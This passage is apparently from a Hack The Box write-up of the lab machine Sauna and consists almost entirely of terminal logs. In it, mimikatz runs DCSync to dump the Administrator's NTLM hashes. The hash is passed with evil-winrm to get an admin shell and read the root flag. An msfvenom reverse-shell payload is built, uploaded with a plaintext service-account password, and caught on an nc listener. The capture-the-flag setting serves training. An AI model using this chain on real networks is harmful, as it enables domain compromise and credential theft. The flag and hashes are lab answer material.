+             $Processors = Get-WmiObject -Class Win32_Processor
+                           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
The property 'AddressWidth' cannot be found on this object. Verify that the property exists.
At C:\Users\svc_loanmgr\Documents\Invoke-Mimikatz.ps1:2593 char:14
+ ...        if ( ( $Processor.AddressWidth) -ne (([System.IntPtr]::Size)*8 ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict
Hostname: SAUNA.EGOTISTICAL-BANK.LOCAL / S-1-5-21-2966785786-3096785034-1186376766

  .#####.   mimikatz 2.1.1 (x64) built on Nov 12 2017 15:32:00
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(powershell) # lsadump::dcsync /domain:Egotistical-bank.local /user:Administrator
[DC] 'Egotistical-bank.local' will be the domain
[DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server
[DC] 'Administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 7/26/2021 9:16:16 AM
Object Security ID   : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 823452073d75b9d1cf70ebdf86c7f98e
    ntlm- 0: 823452073d75b9d1cf70ebdf86c7f98e
    ntlm- 1: d9485863c1e9e05851aa40cbb4ab9dff
    ntlm- 2: 7facdc498ed1680c4fd1448319a8c04f
    lm  - 0: 365ca60e4aba3e9a71d78a3912caf35c
    lm  - 1: 7af65ae5e7103761ae828523c7713031

Now we can pass the hash with the username Administrator and NTLM hash 823452073d75b9d1cf70ebdf86c7f98e

┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ evil-winrm -i 10.10.10.175 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e~  
                                        
Evil-WinRM shell v3.5
                                        
Error: Invalid hash format
                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ evil-winrm -i 10.10.10.175 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> ls


    Directory: C:\Users\Administrator


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        1/23/2020   3:11 PM                3D Objects
d-r---        1/23/2020   3:11 PM                Contacts
d-r---        7/14/2021   3:35 PM                Desktop
d-r---        1/23/2020   3:11 PM                Documents
d-r---        1/23/2020   3:11 PM                Downloads
d-r---        1/23/2020   3:11 PM                Favorites
d-r---        1/23/2020   3:11 PM                Links
d-r---        1/23/2020   3:11 PM                Music
d-r---        1/23/2020   3:11 PM                Pictures
d-r---        1/23/2020   3:11 PM                Saved Games
d-r---        1/23/2020   3:11 PM                Searches
d-r---        1/23/2020   3:11 PM                Videos


*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/27/2023   9:38 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
f2d1be3960ce7c6cde8ab677b5713616
*Evil-WinRM* PS C:\Users\Administrator\Desktop> 

Will try and run mimikatz which was initially failing on evil-wrm. We will run a reversh shell and run from our Kali

Creating a reverse shell using msfvenom then upload to the machine

┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.18 LPORT=443 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> upload /home/kali/HTB/Sauna/shell.exe
                                        
Info: Uploading /home/kali/HTB/Sauna/shell.exe to C:\Users\svc_loanmgr\Documents\shell.exe

Run the reverse shell with listener

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> .\shell.exe
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> 


and 

listening on [any] 443 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.175] 50175
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\svc_loanmgr\Documents>


upload and run mimikatz.exe and this works and we get the same hash to pass


┌──(kali㉿kali)-[~]
└─$ nc -nlvp 443 
listening on [any] 443 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.175] 50175
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\svc_loanmgr\Documents>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 489C-D8FC

 Directory of C:\Users\svc_loanmgr\Documents

08/27/2023  12:20 PM    <DIR>          .
08/27/2023  12:20 PM    <DIR>          ..
08/27/2023  11:39 AM         2,411,274 Invoke-Mimikatz.ps1
08/27/2023  12:21 PM           927,384 mimikatz.exe
08/27/2023  12:08 PM            73,802 reverse.exe
08/27/2023  12:01 PM            73,802 reverse_shell.exe
08/27/2023  12:18 PM             7,168 shell.exe
               5 File(s)      3,493,430 bytes
               2 Dir(s)   7,828,529,152 bytes free

C:\Users\svc_loanmgr\Documents>mimikatz.exe
mimikatz.exe

  .#####.   mimikatz 2.1.1 (x64) #17763 Dec  9 2018 23:56:50
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # lsadump::dcsync /domain:Egotistical-bank.local /user:Administrator
[DC] 'Egotistical-bank.local' will be the domain
[DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server
[DC] 'Administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   : 
Password last change : 7/26/2021 9:16:16 AM
Object Security ID   : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 823452073d75b9d1cf70ebdf86c7f98e
    ntlm- 0: 823452073d75b9d1cf70ebdf86c7f98e